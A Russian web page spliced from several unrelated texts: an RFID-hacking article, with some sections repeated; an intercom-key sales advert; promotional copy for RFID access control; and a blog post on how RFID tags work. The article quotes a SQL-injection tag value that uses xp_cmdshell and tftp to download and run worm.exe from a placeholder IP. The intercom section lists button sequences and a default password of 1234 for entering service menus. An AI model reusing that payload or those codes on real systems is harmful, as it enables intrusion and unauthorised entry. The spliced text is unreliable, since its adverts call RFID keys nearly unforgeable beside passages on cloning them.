Ключи от домофона rfid с прозрачным центром. Технология RFID глазами хакера: от домофонных ключей до чипов для имплантации человеку. Наблюдения и замечания

RFID (Radio Frequency IDentification) - технология автоматической идентификации, в котором посредством радиосигналов считываются и записываются данные. Данные хранятся в так называемой RFID - метке. RFID-система состоит из ридера и метки.

RFID-метки классифицируются по рабочей частоте, типу памяти и источнику питания. Ридеры бывают стационарные и мобильные.

Типы атак, применяемые в технологии RFID

Читая интересные статьи про RFID становится не по себе от примеров возможных атак. Ниже представлен небольшой список применяемых атак:

• Dos-атака
• RFID-Zapper
• Клонирование
• Атаки через RFID-метки

Dos-атака

Ученые из австралийского университета утверждают, что RFID первого поколения подвержены Dos-атаке. Суть в том, что чипы этого поколения используют диапазон 902-938 МГц, разделенный на каналы. Сканер может переключаться с одного канала на другой, а чип в силу своей пассивности не может сменить диапазон. Утверждается, что данный диапазон можно заглушить с расстояния в 1 м. с помощью несложного радиопередатчика. В связи с этим приводится достаточно абстрактное сравнение с Dos-атакой.

RFID-Zapper

Следующая атака - это простое уничтожение метки. Двое парней из рядов «Хаоса» пришли к выводу, что нахождение чипа в микроволновке на протяжении короткого времени является самым действенным способом уничтожения метки. В связи с этим был разработан девайс RFID-Zapper. В качестве основы использовали фотоаппарат-мыльницу. После некоторых апдейтов девайс научился создавать сильное электромагнитное поле, которое убивает пассивные метки.

Клонирование

Джонатан Вестхьюз (Jonathan Westhues) - студент, который создал устройство, позволяющее клонировать метки. Девайс назван proxmark. Он легко помещался в карман и при достаточно близком расстоянии можно незаметно клонировать метку.

Подмена содержимого памяти RFID-меток

На завершившейся хакерской конференции Defcon немецкий эксперт инфосека Лукас Грюнвальд (Lukas Grunwald) продемонстрировал, как содержимое электронного паспорта может быть легко перенесено на любую другую радиометку. При этом Лукас использовал разработанную вместе с его коллегой Борисом Вольфом (Boris Wolf) еще пару лет назад прогу RFDump, которая умеет считывать, редактировать, записывать (если это возможно) данные RFID-меток. Первой версией данной проги был простенький perl-скрипт, теперь же RFDump представляет собой удобную тулзу, распространяющуюся под лицензией GPL. Существуют пока только версии для Linux. Для работы программы необходим RFID-ридер ACG Multi-Tag Reader или ему подобный. Грюнвальд вносит в софт время от времени кое-какие поправки. Например, сейчас она позволяет задействовать в метке счетчик считываний (функция cookie), планируется введение возможности снятия шифрования данных меток с помощью брутфорса или атаки по словарю, а также проверка на ключи, выставляемые «по умолчанию».

После создания своей программы Лукас и Борис занялись активным изучением возможности взлома различных RFID-систем. Первым делом они изучили RFID-систему местного университетского кафе, где данные о сумме на счете клиента хранились прямо на карточке. Питание там стало для них бесплатным:). Дальше - больше: они останавливались в гостиницах и отелях, в которых для входа в номер использовались proximity-карты. Интересный факт: ни одна из десяти изученных ими RFID-система из не имела шифрования, и Грюнвальд после изучения 2-3 карт мог создать мастер-карту, открывающую любую дверь. Но и системы с шифрованием очень просто обойти: либо ключ подбирался простым перебором, либо стоял выставленный производителем по умолчанию. Уязвимыми оказались и системы супермаркетов, где начали применять RFID как альтернативу штрихкодам. Хакеры получили возможность с помощью карманных компьютеров поменять метки дорогостоящих товарах на менее дорогие, «спасая» таким образом свою наличность. По словам Грюнвальда, 3/4 всех изученных им RFID-систем оказались так или иначе уязвимы.

Атаки через RFID-метки

На самом деле через редактирование метки можно получить доступ к компьютеру и тем самым совершать различного рода атаки. Уязвимые места RFID-метки: SQL-Injection, web-интерфейсы, где не исключена возможность внедрения вредоносного кода, а также buffer overflow.

Допустим, в RFID-системе используются только метки с объемом памяти 128 байт. Программист, писавший приложение, обрабатывающее содержимое тэгов, поленился сделать проверку на длину этого самого содержимого. В итоге имеется возможность для переполнения буфера, ведь хитрый хакер может подсунуть системе метку с большим количеством памяти, чем 128 байт, внедрив туда и шелл-код.

Примеры реальных атак

Чтобы было ясно какие виды проблем могут возникать от RFID-хакинга рассмотрим сценарий реальной атаки.

- «Шутник» идет в супермаркет, в котором сканирует продукты в корзинах. Продукция магазина оснащена RFID-метками, а не штрих-кодами. Многие супермаркеты планируют ввести систему RFID, поскольку сканирование происходит гораздо быстрее. «Шутник» выбирает продукт, например, шоколадную пасту, сканирует и идет на кассу его оплачивать. Придя домой, он удаляет и уничтожает RFID-метку (уничтожить метку можно способами, описанными в пункте RFID-Zapper). Затем он берет пустые RFID-метки и пишет эксплойт на компьютере, который в последствии прикрепит к метке. Далее инфицированная метка прикрепляется к шоколадной пасте и относится в магазин. «Шутник» снова ее покупает, кассирша сканирует и в этот печальный момент заражается вся база данных супермаркета.

Игры нашего «шутника» продолжаются. У нашего героя есть кошка, у которой имеется подкожная ID-метка, которую «шутник» может перезаписать на какой-нибудь эксплойт с использованием коммерчески доступного оборудования. Далее, он идет к ветеринару с жалобой, что кошка постоянно просит еды. Ветеринар сканирует и происходит тоже самое, что и в предыдущем рассказе - заражается база данных и данное действие приводит к хаосу.

И самая страшная часть. Аэропорты тоже планируют ввести RFID-метки, которые будут крепиться к багажу. Это обусловлено тем, что RFID-метки возможно считывать на большом расстоянии, нежели штрих-коды багажа. Принцип действия тот же самый - приходит злой путешественник с инфицированной меткой, его сканируют. Только последствия гораздо опаснее - могут быть заражены сотни аэропортов по всему миру.

Многие компании на данный момент утверждают, что их ПО отображают данные виды атак.

Защита

Общие советы
- Многие компании при создании нового ПО публикуют код, чтобы сторонние программисты за вознаграждение помогли отыскать баги, допущенные разработчиками. Рекомендуется тоже самое делать и с ПО RFID.

Удалять ненужные функции.

Остановка атак на базу данных.

Для того, чтобы избежать атаки типа SQL - Injection следует выполнять тщательную проверку данных, передаваемых SQL - запросом. Так же существует понятие ORM - библиотек, которые являются посредником между базой и программой. Некоторые базы данных предоставляют возможности, которые ограничивают вероятность нападения. Например, как Oracle и MySQL позволяет только один запрос к исполнению в течение вызовов API, хотя новых версий MySQL позволяют программисту включить несколько запросов.

Клиентские сценарии можно предотвратить с помощью правильной обработки скриптов. Языки, используемые в web-разработке, обычно предоставляют функции, которые могут сделать это за вас. PHP может делать это автоматически для каждой строки, используя свои «магические кавычки». Если скриптовый язык не требуется, его отключение позволит избежать любой возможности его злоупотребления. SSI инъекцию можно также избежать использованием надлежащей обработки. Или отключить SSI.

Переполнение буфера (stack overflow) можно также избежать надлежащей проверкой границ буфера. Такие инструменты как Valgrind и Electric Fence
помогут осуществить проверку. Конечно использование языка программирования, который выполняет данные проверки, было бы гораздо лучше. Один из таких языков является Java.

Без домофонного ключа попасть в помещение, оборудованное системой контроля доступа, невозможно. В некоторых случаях, когда имеется кодовая панель, разблокировать электрозамок можно с помощью введения комбинации цифр. Но каждому абоненту, пользователю, у которого есть основания попадать в помещение часто, необходимо иметь домофонный ключ. Есть ключи контактные, а есть домофонные ключи RFID , которые вы видите в данной категории.

Ключи RFID - это бесконтактные ключи. Такой тип устройств характеризуется наличием чипа и антенны. Они взаимодействуют с соответствующими типами считывателей на расстоянии. В случае с простыми моделями ключ требуется держать на расстоянии 3-5 см от считывателя, в случае с усовершенствованными - дистанция может быть до 70 см.

Как происходит считывание с RFID ключей?

1. Считыватель генерирует поля для работы, на которое реагирует ключ, а точнее механизмы, находящиеся внутри него.
2. Ключ, поднесенный к считывателю, в ответ передает данные. Данные хранит чип. На чипе есть кодовая комбинация, которая, кстати, в RFID типе считается практически неподдельной.
3. Быстрый анализ дает возможность разблокировать замок, если ключ внесен в домофонную базу. Анализ заключается в соотношении кода ключа с теми, что сохранены в памяти устройства. Соответственно, если в домофонной базе нет ключа, который человек подносит к панели, ничего не произойдет.

Домофонные ключи RFID типа имеют различные интерпретации. Они выполняются в виде:

1. карты;
2. брелока;
3. браслета и пр.

ДОМОФОННЫЕ КЛЮЧИ RFID : ЗАКАЗ НА сайт

Вне зависимости от того, с какой целью вы хотите приобрести домофонные ключи RFID, мы предлагаем сделать это в «Домофонном сервисе». Поскольку только здесь можно найти наиболее низкие цены в Москве на товар, который по качеству соответствует всем нормам и стандартам.

Покупая на сайт вы получаете гарантию от производителя, а также доставку в нужный вам район Москвы и области, любой другой области страны. Оплата производится также удобным вам способом, перечень их можно узнать в соответствующей категории сайта.

Если хотите, перед тем как домофонные ключи RFID купить , получить консультацию, оставьте контакты и получите звонок на мобильный.

Технология RFID

Краткое описание технологии RFID. Вообще, RFID или Radio Frequency IDentification (радиочастотная идентификация) — это метод удаленного хранения и получения информации путем передачи радиосигналов с помощью устройств, называемых RFID-метками. История появления данной технологии восходит к первой половине XX столетия. Британские ВВС еще в начале Второй мировой использовали подобную технологию, устанавливая на самолеты устройства радиочастотной идентификации, позволяющие эффективно отличать свои авиационные юниты от самолетов противника. Есть также сведения, что в СССР в 50-х годах похожая технология использовалась для шпионажа. С 60-х годов начинаются исследования о возможности применения RFID в гражданских целях, а первая радиометка, аналогичная применяемым сегодня, была создана в научной лаборатории Лос Аламос в 1973 году. Принцип работы RFID-систем весьма прост. Данные системы включают в себя два основных компонента: считыватель (ридер) и идентификатор (метка, чип, тэг). Ридер излучает электромагнитную энергию. Метка улавливает этот сигнал и передает ответный, который уже принимается антенной ридера. Внутри карты или брелка содержится антенна в виде катушки тонкого провода.

По своему типу системы RFID подразделяются на пассивные и интерактивные. В пассивной системе излучение считывателя находится постоянно во времени (то есть не модулировано) и служит только источником питания для радиометки, которая собственного источника энергии не имеет. Получив энергию от ридера, метка включается и передает сигнал, который принимается считывателем. Вышеописанным способом работает большинство систем управления доступом, где необходимо только получить серийный номер идентификатора.

Более продвинутые RFID-системы используют интерактивный режим работы. Ридер в таких системах излучает модулированные колебания, то есть формирует запрос. RFID-метка дешифрирует запрос, обрабатывает его, и, если это необходимо, формирует соответствующий ответ. Подобные системы необходимы, например, для работы с товарами, маркированными радиометками. Дело в том, что если система пассивная, то при попадании одновременно нескольких меток под излучение ридера их сигналы накладываются друг на друга, и возникает коллизия. Интерактивные же системы снабжены механизмом антиколлизии. Интерактивные RFID-тэги часто имеют встроенную батарею, заряда которой может хватить на несколько лет. Интерактивные метки с собственным источником питания называют активными, а те, что без него, — полупассивными.

RFID-метки можно подразделить на несколько категорий. Во-первых, по используемому диапазону радиочастот на:

• низкочастотные (125 или 134,2 КГц);
• высокочастотные (13,56 МГц);
• UHF, то есть ультравысокочастотные (868-956 МГц);
• микроволновые (2,45 ГГц).

Во-вторых, по размерам встроенной памяти, которая может быть от 4 байт до 4 Кб. Кроме того, метка может иметь память только для чтения или же с возможностью дозаписи и перезаписи информации. Существует несколько стандартов RFID-меток, сформировавшихся на сегодняшний день. Важным свойством радиометки является и ее размер, который может составлять всего 0.4х0.4 мм для пассивных меток, в то время как активные метки имеют размер с монету.

Применение: за и против

Применяться RFID может в самых разных областях. Во-первых, СКУД, то есть системы контроля и управлением доступом. Исторически это было первым применением технологии RFID. Сегодня доступ в офис или дом с помощью proximity-карты со встроенным радиочипом — уже вполне обычное дело. Большинство подобных систем используют пассивные метки и работают в низкочастотном диапазоне, хотя в последнее время все чаще встречаются интерактивные системы на частотах 13,56 МГц. Реально новое направление в этой области - создание RFID-имплантатов для людей. Первый эксперимент такого рода был проведен еще в 1988, а сегодня компания Applied Digital Solution предлагает любому желающему имплантировать себе в руку свою разработку - VeriChip.

Во-вторых, это контроль над перевозкой грузов и конкретных товаров, их складской учет. Представь только, как просто будет проходить ревизия на складах или в супермаркетах: достаточно пройтись с ридером вдоль полок с товарами — и все автоматически будет переучтено в БД товаров. Существует стандарт RFID называемый EPC (electronic product code), являющийся аналогом штрихкодов. Специалисты считают, что в ближайшее десятилетие RFID-метка на каждом отдельном товаре станет таким же обычным явлением, как сегодня штрихкод.

Еще одна очень важная область применения RFID - это электронные документы. Государства многих стран, в том числе и России, планируют уже в самое ближайшее время начать встраивать RFID-метки в паспорта своих граждан. При этом в память имплантированной в паспорт метки будут заноситься не только обычные данные владельца (ФИО, год рождения и т.д.), но и биометрические признаки, а также цветное фото.

Как это всегда бывает, у технологии, подобной RFID, появляется множество сторонников и противников. Несмотря на все удобства, привносимые применением RFID, у многих людей ее внедрение вызывает большие опасения. И не зря. Во-первых, радиометки по своей сути являются радиомаяками - ведь именно в этом качестве их использовала советская разведка в 50-х. И незаконное слежение еще не единственное, что вызывает опасения. Большие опасения вызывает безопасность самой технологии. Сам Брюс Шнайер на планы оснащения паспортов RFID-метками, заявил, что «это чистая угроза национальной безопасности».

Конечно, такую важную технологию, как RFID, не могли оставить без внимания хакеры и различные исследователи информационной безопасности. Первое, на чем хотелось бы заострить внимание, — это проблема, связанная с вмешательством в личную жизнь человека, которая возможно будет иметь место в самом обозримом будущем. Только представь, что государство или же крупные корпорации будут иметь под контролем тысячи считывателей радиометок, расположенных на входе в метро, супермаркет или просто посреди улиц. Такие считыватели способны накапливать информацию о нашем перемещении, о том, какие товары мы только что приобрели в магазине. Конечно, сегодня это звучит несколько бредово, но пройдет, возможно, менее десятка лет, и наступит время, когда каждый из нас добровольно или же принудительно будет всегда носить с собой имплантированный под кожу идентификационный чип. Напоминает кино в жанре киберпанк? Как бы то ни было, все идет именно к этому.

RFID и хакеры

Австралийские исследователи компьютерной безопасности в апреле этого года опубликовали работу, в которой описывается возможность препятствования считыванию информации RFID-ридером с метки. В их планах — создание устройства, которое не позволит считывать информацию с RFID-меток без ведома их владельца. Они использовали метод, напоминающий DoS-атаку: радиоэфир захламляется огромным множеством сигналов, имитирующих сигналы меток. RFID-ридеры первого поколения, то есть пассивные, не имеют возможности считать данные с карты из-за вышеупомянутого явления - коллизии. Интересно, что более продвинутые интерактивные ридеры, как показали опыты, также напрочь уходят в даун.

Но с созданием первого анти-RFID гаджета австралийцев опередили голландцы. В начале апреля на околокомпьютерных сайтах запестрила новость о разработанном сотрудниками Свободного университета Амстердама устройства, которое препятствует чтению RFID-меток и информирует владельца о подобных попытках. Данный девайс разрабатывался в рамках проекта RFID Guardian (https://www.rfidguardian.org) группой исследователей под руководством профессора Эндрю Таненбаума (Andrew Tanenbaum), который, кроме этого, занимается еще рядом проектов, посвященных безопасности RFID-систем. Разработанное голландцами устройство представляет собой КПК с 550Mhz процессором и 64 Мб памяти, оборудованный RFID-ридером и необходимым ПО.

Настоящие хакеры смотрели на проблему несколько иначе. Двое немецких компьютерщиков MiniMe и Mahajivana, состоящие в рядах «Хаоса», решили, что лучший способ обезопасить себя от угроз, которые может принести технология RFID, — это простое уничтожение RFID-меток. Наиболее действенным способом убийства радиометок, обнаруженными хакерами, оказалось помещение их на короткое время в микроволновку. Но далеко не любой предмет со встроенным RFID-чипом засунешь в микроволновую печь, поэтому был разработан девайс, названный RFID-Zapper. Создатели устройства решили, что стоимость его должна быть минимальна, поэтому использовали в качестве основы одноразовый фотоаппарат-мыльницу, который сможет раздобыть любой желающий. После некоторых усовершенствований вспышка такого фотоаппарата научилась создавать сильное электромагнитное поле, наповал убивающее пассивные радиометки. Правда, пока только 13,56-мегагерцовые, но создатели Zapper"а обещают дальнейшее развитие проекта. RFID-Zapper вызвал у всех большой интерес на состоявшемся некоторое время назад европейском 22-м слете хакеров CCC.

Клонирование

Проблемы шифрования

ExxonMobil - крупнейшая нефтяная корпорация, владеющая сетью бензозаправочных станций в США. Она внедрила на своих заправочных станциях инновационную платежную систему SpeedPass: оплата осуществлялась с помощью брелока с RFID-чипом внутри, на котором записаны данные о платежном счете его владельца в системе SpeedPass. Трое исследователей компьютерной безопасности — Стив Боно (Steve Bono), Мэтью Грин (Matthew Green) и Адам Стаблфилд (Adam Stubblefield) — конкретно взялись за изучение этой системы. RFID-чипы, использовавшиеся в этой системе, представляли собой разработку Texas Instruments под названием Digital Signature Transponder (DST).

DST - это полупассивная радиометка с системой 40-битного шифрования. Хотя 40-битное шифрование сегодня достаточно легко вскрываются брутфорсом. Сложность вскрытия ключа заключалась в том, что сам алгоритм шифрования взломщикам был неизвестен. Но парням удалось восстановить его, используя различные криптоаналитические методы. Затем они собрали мощный кластер, который смог расшифровывать по 5 ключей менее чем за 2 часа. Позже было сконструировано устройство, эмулирующее работу DST, которое было проверено в действии на одной из станций ExxonMobil. После того как представители ExxonMobil ознакомились с результатами этого исследования (https://rfidanalysis.org), они заявили в прессе, что на практике все это не реализуемо, так как испытание «лабораторное». Но компания все же решила перестраховаться и перейти на чипы с 128-битным шифрованием.

Посмотрим, как обстоит дело с криптозащитой электронных документов. Нидерландские спецы по информационной безопасности из фирмы Riscure первыми взломали прототип электронного паспорта, который собираются вводить в Евросоюзе. Удалось им это вследствие достаточно простого алгоритма, примененного для шифрования личных данных владельца. Такая информация, как день рождения владельца паспорта, серийный номер, срок окончания его действия, легко предсказуема, и помогла «взломщикам» расшифровать остальное содержимое памяти радиометки.

Окончательно добил все представления о самой возможности безопасной RFID известнейший криптолог, профессор института Вейсмана Ади Шамир (Adi Shamir). Исследования ученый проводил на RFID-метках стандарта EPC (один из наиболее перспективных стандартов на сегодняшний день), работающих в UHF-диапазоне частот и использующих 8-ми и 32-битное шифрование данных. Для подбора ключа использовалась направленная антенна и цифровой осциллограф. Выяснилось, что при посылке чипу неверного бита ключа шифра энергопотребление RFID-чипа несколько возрастает, что может быть зафиксировано несложной аппаратурой. Таким образом, возможен взлом даже достаточно длинных ключей, причем в весьма короткое время. И это уже не проблема шифрования, а скорее проблема недоработки самой технологии RFID. Шамир представил также интересную идею о возможности создания девайса для расшифровки данных с UHF RFID-тэгов из обычного мобильника путем замены его ПО. Ведь GSM-мобилы и UHF-радиометки могут работать в одних и тех же частотах. Буду с нетерпением ждать, что получится из этой затеи.

Подмена содержимого памяти RFID-меток

Не спасает шифрование паспортов и от их клонирования. На завершившейся недавно хакерской конференции Defcon немецкий эксперт инфосека Лукас Грюнвальд (Lukas Grunwald) продемонстрировал, как содержимое электронного паспорта может быть легко перенесено на любую другую радиометку. При этом Лукас использовал разработанную вместе с его коллегой Борисом Вольфом (Boris Wolf) еще пару лет назад прогу RFDump , которая умеет считывать, редактировать, записывать (если это возможно) данные RFID-меток. Первой версией данной проги был простенький perl-скрипт, теперь же RFDump представляет собой удобную тулзу, распространяющуюся под лицензией GPL. Существуют пока только версии для пингвина. Для работы проги необходим RFID-ридер ACG Multi-Tag Reader или ему подобный. Грюнвальд вносит в софтину время от времени кое-какие поправки. Например, сейчас она позволяет задействовать в метке счетчик считываний (функция cookie), планируется введение возможности снятия шифрования данных меток с помощью брутфорса или атаки по словарю, а также проверка на ключи, выставляемые «по умолчанию». Скачать RFDump можно на сайте разработчиков: https://www.rf-dump.org.

После создания своей проги Лукас и Борис занялись активным изучением возможности взлома различных RFID-систем. Первым делом они изучили RFID-систему местного университетского кафе, где данные о сумме на счете клиента хранились прямо на карточке. Питание там стало для них бесплатным:). Дальше — больше: они останавливались в гостиницах и отелях, в которых для входа в номер использовались proximity-карты. Интересный факт: ни одна из десяти изученных ими RFID-система из не имела шифрования, и Грюнвальд после изучения 2-3 карт мог создать мастер-карту, открывающую любую дверь. Но и системы с шифрованием очень просто обойти: либо ключ подбирался простым перебором, либо стоял выставленный производителем по умолчанию. Уязвимыми оказались и системы супермаркетов, где начали применять RFID как альтернативу штрихкодам. Хакеры получили возможность с помощью карманных компьютеров поменять метки дорогостоящих товарах на менее дорогие, «спасая» таким образом свою наличность. По словам Грюнвальда, 3/4 всех изученных им RFID-систем оказались так или иначе уязвимы.

Атаки через RFID-метки

Но несанкционированное чтение и клонирование меток — это еще не все. Редактирование содержимого RFID-метки может позволить злоумышленнику осуществить самые разнообразные атаки на компьютеры, работающие с RFID. Уязвимыми местами RFID-систем могут стать базы данных, которые могут быть подвержены sql-инъекциям; web-интерфейсы - здесь возможны различные виды внедрения вредоносного кода; не исключена возможность атак типа buffer overflow.

Наиболее просто реализуема атака типа sql-injection. Допустим, приложение, работающее с RFID, записывает на метку какую-то информацию, например, если это коробка с товаром, говорящая о ее содержимом - «beer». Вот пример атаки на win-систему, уязвимую к sql-inj: хакер изменяет значение тэга на «beer"; EXEC Master..xp_cmdshell cd \Windows\Temp & tftp -i <здесь ip> GET worm.exe & worm.exe;» и загружает (конечно, если машина подключена к инету) таким образом червя в систему с БД товаров при считывании информации с метки.

Аналогично происходят атаки на системы, имеющие интерфейс, основанный на веб-компонентах. К примеру, внедрение через метку кода «» в уязвимую linux-систему с SSI повторяет вышеописанную атаку на винду. Как ты уже понял, эти атаки практически ничем не отличаются от аналогичных атак на сайты в инете.

Еще пример. Допустим, в RFID-системе используются только метки с объемом памяти 128 байт. Программист, писавший приложение, обрабатывающее содержимое тэгов, поленился сделать проверку на длину этого самого содержимого. В итоге имеется возможность для переполнения буфера, ведь хитрый хакер может подсунуть системе метку с большим количеством памяти, чем 128 байт, внедрив туда и шелл-код.

Вышеприведенные сценарии атак я позаимствовал на сайте www.rfidvirus.org. Там выкладываются результаты исследований уже упомянутой в статье группы ученых во главе с профессором Э.Таненбаумом. Главной целью их исследований было создание вируса, распространяющегося через RFID. И им это удалось: первый концептуальный вирус, не получивший названия, был создан в лаборатории амстердамского университета. Вирус распространяется через RFID-метки и заражает БД систем, использующих RFID.

Конечно, далеко не все RFID-системы подвержены подобного рода атакам. Таненбаум в своих исследованиях использовал не конкретную реализацию какой-то RFID-системы, а созданную для опытов лабораторную модель с модульной архитектурой, позволяющей изучать возможность атак на различные БД, используемых в реальных системах. И хотя производители RFID-систем подвергли критике исследования голландцев, думаю, с повсеместным распространением подобных систем окажется, что немалая их часть будет уязвима к разного рода хакерским атакам.

Сегодня к уязвимостям технологии RFID, кроме хакеров и исследователей компьютерной безопасности, проявляют интерес и представители криминального мира: разного рода мошенники, автоугонщики, террористы. Пытаясь привлечь внимание к опасностям, скрывающимся в использовании этой прогрессивной технологии, хакеры даже продемонстрировали возможность использования RFID-сканера в качестве детонатора взрывного устройства, реагирующего на метку, встроенную в паспорт человека, которого необходимо ликвидировать.

https://www.rfidguardian.org - сайт проекта RFID-Guardian

https://www.rfidvirus.org - здесь можно найти информацию о возможности распространения разного рода malware-кода через RFID, наработки по написанию RFID-вирусов и троев.

https://cq.cx - сайт эксперта по безопасности RFID-систем Джонатана Вестхьюза.

https://rfidanalysis.org - проект по взлому DST.

https://www.rf-dump.org - сайт создателей RFDump"а.

Сегодня широко и повсеместно применяется rfid система контроля доступа. Такая СКУД позволяет быстро идентифицировать людей, транспорт на большом расстоянии.

Инновационная rfid система контроля доступа очень выгодная, ускоряет и упрощает рутинные процессы. Ее установили многие транспортные и торговые предприятия, компании работающие в сфере оказания самых разных услуг. Выгодно применять ее в промышленности, на складах, в библиотеках и медицинских учреждениях. Применение rfid решения находят везде.

РФИД домофон

Самым надежным и функциональным устройством доступа многие специалисты называют RFID домофон в отличии от устаревших модификаций этих устройств. И этому есть много причин. Их устанавливают в местах большой проходимости, и они успешно справляются со своей задачей. Скорость работы обеспечивается за счет автоматической передачи данных. Современный rfid ключ нет необходимости прикладывать вплотную к считывателю. Такие домофоны установили многие компании и частные лица. Их можно встретить:

— в офисных помещениях и жилых зданиях;

— в организациях образования закрытого типа;

— в научных институтах с высокими требованиями к уровню защиты.

Подделать ключ и открыть с его помощью надежный rfid замок практически невозможно. Идентификаторы не имеют источника питания, поэтому не нужно бояться, что не получится войти в здание, если батарея в устройстве разрядится. Они включаются автоматически в момент соединения с электрическим полем считывателя.

Ключи для такого домофона делаются в форме таблетки или карты. Такие идентификаторы имеют возможность взаимно заменять друг друга. При необходимости для открытия двери можно использовать их оба. При потере rfid ключа для домофона его легко и просто заменить. Дубликат изготавливается при помощи специального программатора очень быстро, стоит недорого. Чтобы открыть замок, настроить систему, предусмотрены специальные коды. Они известны только специалистам установщикам.

Коды доступа для домофона у каждого производителя свои. Есть способы получить их используя комбинации клавиш. Чтобы узнать код доступа нужно нажать и удерживать двадцать секунд кнопку «вызов», после этого на дисплее появится пять цифр. Они быстро исчезают.

Чтобы узнать инженерный код нужно нажать и удерживать любую цифру пока не появится на дисплее надпись «CODE». После ввода стандартного системного пароля 1234 на экране засветится версия прошивки и меню «FUNC». Большинство кодов указаны в документации, в инструкции к домофону.

RFID ворота

РФИД ворота обеспечивают контролируемый проход посетителей библиотек, выставок, офисов и практически любых других объектов. Они оснащаются рядом немаловажных функций:

— светодиодной индикацией;

— звуковой сигнализацией;

— счетчиком посетителей.

С их помощью можно прекратить разворовывание товара, книг, вести учет их перемещения, документов. Их подключают к АБИС, и это дает возможность на экране компьютера видеть кто и что выносит. Благодаря их установке можно освободить персонал от большей части рутинной работы. Получится во много раз снизить трудоемкость проведения инвентаризации. Можно организовать залы свободного доступа. В зависимости от модели ворота RFID отличаются по следующим показателям и характеристикам:

— стандартом передачи радиочастотной идентификации;

— режимом обнаружения;

— структурой и размерами;

— функциональностью.

Современные rfid ворота – это необходимость.

RFID для охранных организаций

Организовывать контроль доступа rfid охранным организациям очень выгодно. Компании, охраняющие стоянки, могут заказать систему, укомплектованную автоматическими шлагбаумами и электрическими приводами ворот. Идентификаторами пользователей будут карты, радио брелоки или электронные ключи.

Такая система отличается удобством и практичностью, быстро окупается. RFID метки купить можно в виде наклеек. Они могут располагаться на лобовом стекле автомобиля, на обратной стороне зеркала заднего вида. Из преимуществ RFID для охранных организаций можно выделить:

— надежность, уровень безопасности технологии rfid идентификация очень высокая;

— эффективность карт и считыватель ключей rfid;

— не высокую стоимость установки и обслуживания;

— нет элементов питания, малая вероятность подделки, дублирования;

— быстрая окупаемость.

Комплект системы RFID для охранных организаций можно подобрать в зависимости от потребностей компании, с учетом всех тонкостей и нюансов, специфики ее работы.

Считыватель ключей РФИД Arduino

RFID считыватель карт Arduino используется для чтения или записи бесконтактных меток. Модуль выгодно применить в системе контроля доступа, при автоматической идентификации. Им пользуются робототехники. Он поможет при отслеживании вещей. Практическое применение автоматический rfid arduino замок нашел для открывания дверей, ящиков, шкафов.

RFID считыватель карт Arduino имеет несколько разъемов. Они необходимы для подключения микроконтроллера, питания и антенны. На плате может быть установлен и дополнительный разъем под вторую антенну, все зависит от ее модификации и особенностей.

Модуль обычно работает, используя UART интерфейс и с помощью RS485 может передавать информацию на большие расстояния. Питание платы осуществляться от Arduino контроллера или микропроцессорного управляющего устройства, от внешних источников.

Считыватель ключей RFID Arduino можно использовать для самых разных целей. Если дома применить карту как триггер, можно задать различные сценарии автоматизации. Положив карточку в книгу, и разместив считыватель на прикроватной тумбе, можно не думать об экономии электричества. Не нужно будет вставать и идти к выключателю. Когда положим книгу на тумбу автоматически выключится освещение. А если возьмем ее в руку, то свет включится.

Современный RFID домофон, ворота, комплексы для охранных организаций, считыватели ключей Arduino успешно используются уже многими. Те, кто установил их, спустя неделю применения не могут представить себе, как раньше обходились без таких удобных, безопасных, недорогих технологических решений.

Пока в стране идут новогодние праздники и все отдыхают наконец соберу весь накопленный материал в одну кучку. Я давно не писал в блог, постараюсь исправиться в нынешнем году. Я не пишу о политике, философии, событиях моей жизни, только о железках. Увы о железах на работе я писать не могу в силу определенных причин, но копится материал научно-популярного и просветительского толка. Очень сложно написать лучше, чем уже написано в той же википедии.

RFID – R adio F requency ID entification – радиочастотная идентификация. На сегодня RFID метки это более широкое понятие и сюда приплетают в том числе и беспроводные сенсоры, хотя идентификация – не их основное занятие. RFID метка – это небольшое устройство, которое позволяет на расстоянии, в отсутствие прямой видимости считать сохраненные на нем данные, тем самым идентифицировать объект. Это как штрихкод, наклеенный на товар, только работающий по радио.

RFID метки бывают разных типов. По способу электропитания различают пассивные (полностью получают питание для работы от излучения считывателя) и активные (имеют на себе батарейку). Само собой у пассивных дальность действия ниже, зато срок службы ничем не ограничен. У активных все лучше, и дальность действия, и начинка поинтеллектуальнее, но батарейку нужно будет менять.

По радиочастотному диапазону различают LF (125 кГц), HF (13.56 МГц) и UHF (860-960 МГц).

Принцип действия

Считыватель и метка имеют катушки индуктивности, образующие колебательный контур. Когда считыватель создает переменное магнитное поле своей катушкой, магнитный поток проходя через катушку метки возбуждает в ней ток. Точно так же как работает к примеру беспроводная зарядка. Метка от возбужденного в катушке тока получает питание, и используя транзистор может на некоторое время (питаясь в это время от накопленного в конденсаторе заряда) замыкать катушку накоротко, тем самым меняя значение амплитуды тока в катушке считывателя. Считыватель фиксирует эти изменения, тем самым принимая сигнал от метки.

Устройства UHF диапазона работают аналогично, только вместо катушек – диполи:

(Иллюстрация из книги RFID Handbook by Klaus Finkenzeller 2 редакция)

Само собой это означает что весь обмен данными между меткой и считывателем происходит публично, и при решении задач определения подлинности нужно это учитывать.

Активные метки более разнообразны по устройству, некоторые вообще по сути являются радиомаяками, по несколько раз в секунду просто посылая в эфир свой номер (parsec). RFID метка помимо микроконтроллера, обеспечивающего передачу уникального номера может быть оснащена различными датчиками. Например датчиком давления. Такой датчик можно разместить в шину автомобиля и непрерывно контролировать давление воздуха в шине.

С каждым днем RFID меткам находят все больше применений. Начиная от использования в качестве ключей для домофона заканчивая противокражными метками в магазинах самообслуживания. Именно увеличение спроса, снижение стоимости из-за массового производства позволяет находить все новые и новые применения.

Метка передает считывателю в ответе на запрос свой уникальный номер. Более сложные метки имеют немного памяти на борту и могут хранить какую либо информацию, например количество оставшихся поездок, что избавляет от необходимости создания центрального сервера и поддержки его на связи всегда. Метка также может иметь на борту криптопроцессор и обеспечивать проверку подлинности или обмен секретными данными. Изучается вопрос добавления RFID меток к банкноты как дополнительная мера защиты.

В будущем возможно все продукты будут снабжены RFID метками на стадии производства, а холодильник RFID считывателем. Тогда взяв вечером спросонья из холодильника пакет молока он молвит человеческим голосом “Сдурел? Выкинь, оно во мне уже пол года лежит, испортилось давно”.

Примеры

Екарта – проездная карточка на все виды транспорта в г.Екатеринбурге. Представляет собой карточку Mifare. Внешний вид:

Немного ацетоновых ванн и видно катушку индуктивности по периметру. Система полностью децентрализованная и информация о количестве денег хранится на самой карте в зашифрованном виде.

Московский метрополитен. Конструкция попроще для удешевления, карточка одноразовая:

Брелок от домофона “Факториал”

Внутри тоже RFID чип от Texas Instruments

